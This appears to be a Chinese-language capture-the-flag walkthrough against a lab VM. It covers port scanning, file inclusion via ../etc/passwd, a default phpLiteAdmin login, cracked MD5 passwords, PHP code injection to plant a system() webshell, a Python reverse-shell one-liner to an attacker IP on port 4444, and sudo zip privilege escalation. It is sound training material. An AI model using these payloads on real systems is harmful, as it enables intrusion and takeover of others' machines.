1.信息收集-查看kali的ip地址

目标靶机与kali在同一网段，使用nmap对所在网段进行扫描，探测主机

判断192.168.115.212是靶机的ip，使用nmap对靶机进行端口扫描，可以看到开放了22（ssh），80（http）和111（rpcbind）端口。

访问靶机开放的网站

在对页面进行多次点击后，发现一处url如下，有可能存在文件包含

在地址栏将page的值改为../../../../../etc/passwd，页面展示了该文件的内容，说明确实存在文件包含漏洞

利用dirsearch工具扫描网站目录

扫描出来了一个貌似数据库管理页面/dbadmin，访问一下

是一个目录，有个test_db.php文件，点击访问

是phpLiteAdmin的登陆界面，百度下该管理系统的默认密码，查询到默认密码是“admin”，尝试登陆。

查询数据库内容，发现了root和zico的用户名和密码，密码格式为32位长度的16进制字符串，很明显是md5值，可以通过一个网站MD5尝试得到密码明文

root--------34kroot34
zico--------zico2215@

利用该账号密码尝试SSH远程登陆，全部失败

在kali查询phpLiteAdmin有没有可利用的漏洞，结果显示1.9.3版本存在远程php代码注入漏洞，下面进行漏洞利用

在刚才的phpLiteAdmin管理页面创建一个hack.php数据库，再在该数据库下创建一个名称为a的表，一个字段

字段名称为code，默认值为<?php phpinfo();?>，插入一行内容

访问创建的数据库，页面成功显示phpinfo信息

2.WebShell

上一步成功显示了phpinfo信息说明漏洞可以利用，将刚才创建的表a删除，重新创建表b，字段名称为code，默认值为<?php echo system($_GET["pass"]);?>

使用kaili监听4444端口

使用python代码来反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

回到kali命令行，可以看到反弹shell成功，但此时并不是root权限，此时身份是www-data

当拿到一个webshell的时候，我们能够执行一些命令，但是这些命令都是非交互的，也就是说不存在上下文的概念。当想使用vim、top等命令时，webshell就无能为力了。我们可以通过python进入tty

python -c 'import pty;pty.spawn("/bin/bash")'

在zico的家目录中找到wordpress，这是一个免费开源的建站程序，进行该目录，查看wp-config.php

在该文件中找到了zico的数据库密码

切换到zico用户

3.提权

使用sudo -l查看zico用户在tar和zip的用户组里面，可以尝试zip提权

在/tmp目录下创建一个空文件，运行如下指令，通过zip运行Linux指令，获取root权限，在/root目录下成功获取到flag